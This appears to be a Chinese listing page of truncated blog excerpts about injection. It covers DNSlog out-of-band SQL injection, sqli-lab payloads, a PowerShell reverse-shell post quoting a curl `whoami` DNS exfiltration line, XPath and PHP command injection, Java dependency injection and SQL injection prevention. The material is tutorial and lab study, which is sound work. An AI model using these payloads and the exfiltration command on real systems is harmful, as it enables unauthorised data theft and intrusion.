测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入.具体原理如下. 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了,图…

之前一直有看到过DNSlog这个字眼,但一直没有好好去了解一下,最近又接触到了刚好来深入学习下 0x01 什么是DNSlog 我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务. 那么DNSlog是什么.DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件. 那怎么利用DNSlog进行注入…

嗯,开始记录sqli-lab的每关笔记,复习一次 1-2关 基于错误的字符串/数字型注入 闭合的符号有区别而已 http://www.sqli-lab.cn/Less-1/?id=1 or 1=1 -- http://www.sqli-lab.cn/Less-1/?id=1' order by 3 --+ #字段数为3 http://www.sqli-lab.cn/Less-1/?id=1' and 1=2 union select 1,2,3 --+ #显示位为2,3 http://www.s…

前置知识: 登录名:登录sql server服务器的用户,而不是操作"数据库用户名". 固定服务器角色:就是上面登录名所属的权限组.其中重要的就是"sysadmin"角色,具有服务器的全部操作权限 数据库用户:操作数据库的用户名,和登录名关联.例如:"dbo用户名" 关联 "sa登录名",所以当执行SELECT USER; 的时候显示的是 dbo 数据库角色:数据库用户所在的组.读,写,db_owner等一些角色. 架构:数据…

使用Powershell反弹Meterpreter Shell cloudeye在windows下的应用 今天突发奇想的一个姿势,算不上什么技巧,分享一下吧. 看到有人问过.http://zone.wooyun.org/content/27440 其实很羡慕linxu的curl `whoami`.xxxxxx.dnslog.info这样去获取数据什么的. windows下面其实用命令也可以实现,不过还是有很多问题. 比如win下获取当前用户: whoami l3m0n3115\l3m0n 获取计…

XPath注入 XQuery注入 测试语句:'or '1'='1 利用工具: Xcat介绍 Xcat是python的命令行程序利用Xpath的注入漏洞在Web应用中检索XML文档 下载地址:https://github.com/orf/xcat 使用说明:http://xcat.readthedocs.io/en/latest/#about-xcat python3.4.1环境 pip install xcat 常用命令读取xml文件: xcat.py --method=GET --public…

一.PHP命令注入介绍 在学习php相关的攻击时,遇到了Command Injection,即命令注入攻击,是指这样一种攻击手段,黑客通过把HTML代码输入一个输入机制(例如缺乏有效验证限制的表格域)来改变网页的动态 生成的内容. 使用系统命令是一项危险的操作,尤其在你试图使用远程数据来构造要执行的命令时更是如此.如果使用了被污染数据,命令注入漏洞就产生了. 1.dos相关的字符和命令 1)& :and符,例如ping 114.114.114.114 & whoami 等价于ping 11…

一.介绍 控制反转(Inversion of Control,简称IoC):整洁架构思想,不允许内部获知外部的存在,这就导致了我们必须在内层定义与外层交互的接口,通过依赖注入的方式将外层实现注入到内部来. 依赖注入(Dependency Injection,简称DI): 高层通过接口隔离具体实现的依赖,就意味着具体实现转移到了外部,究竟使用哪一个具体实现,由外部调用者来决定,只有在运行调用者代码时才将外面的依赖传递给高层. 依赖倒置原则(Dependency Inversion Principl…

结合Autowired和Service注解 public interface IUser { void say(); } @Service public class Student implements IUser { @Override public void say() { System.out.println("I'm a student"); } } @Component @Order(value = 3) public class Entry implements Comma…

SQL注入如何预防? 本文参考自owasp,重点是提供清晰,简单,可操作的指导,以防止应用程序中的SQL注入漏洞.不幸的是,SQL注入攻击很常见,这是由于两个因素: SQL注入漏洞的显着流行 目标的吸引力(即数据库通常包含应用程序的所有有趣/关键数据). 发生了如此多的成功SQL注入攻击有点可耻,因为在代码中避免SQL注入漏洞非常简单. 当软件开发人员创建包含用户提供的输入的动态数据库查询时,会引入SQL注入漏洞.为了避免SQL注入缺陷很简单.开发人员需要: a)停止编写动态查询; b)防止用户…